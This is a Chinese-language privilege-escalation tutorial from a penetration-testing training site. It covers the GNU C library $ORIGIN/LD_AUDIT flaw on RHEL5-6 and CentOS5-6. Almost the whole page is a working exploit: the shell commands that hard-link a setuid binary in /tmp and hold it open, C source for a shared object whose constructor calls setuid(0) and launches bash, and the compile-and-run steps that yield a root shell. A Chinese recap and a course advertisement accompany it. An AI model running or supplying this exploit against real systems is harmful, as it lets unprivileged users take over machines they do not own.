[原创]WEB安全第六章提权篇03 GNU C library 动态链接区 $ORIGIN 溢出提权
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第六章提权篇03 GNU C library 动态链接区 $ORIGIN 溢出提权
利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限
合适用 RHEL5-RHEL6 CENTOS5-CENTOS6 均可以提权
提权方法
![[原创]WEB安全第六章提权篇03 GNU C library 动态链接区 $ORIGIN 溢出提权](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
[moonsec@localhost tmp]$ mkdir /tmp/exploit
[moonsec@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[moonsec@localhost tmp]$ exec 3< /tmp/exploit/target
[moonsec@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x—— 1 moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target
[moonsec@localhost tmp]$ rm -rf /tmp/exploit/
[moonsec@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x—— 1 moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target (deleted)
[moonsec@localhost tmp]$ cat > payload.c -fa
[php]
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[moonsec@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[moonsec@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 moonsec moonsec 4223 Dec 19 06:10 /tmp/exploit
[moonsec@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@localhost tmp]# whoami
[/php]
创建目录
mkdir /tmp/exploit
创建target文件硬链接
ln /bin/ping /tmp/exploit/target
把target文件加载到内存中
exec 3< /tmp/exploit/target
查看target在内存中的情况
ls -l /proc/$$/fd/3
删除目录
rm -rf /tmp/exploit/
输入c代码
cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system(“/bin/bash”);
}
编译文件
gcc -w -fPIC -shared -o /tmp/exploit payload.c
提升root权限
LD_AUDIT=”\$ORIGIN” exec /proc/self/fd/3
![[原创]WEB安全第六章提权篇03 GNU C library 动态链接区 $ORIGIN 溢出提权](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
cetnots5.5 用户moonsec 提权到root权限
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/398.html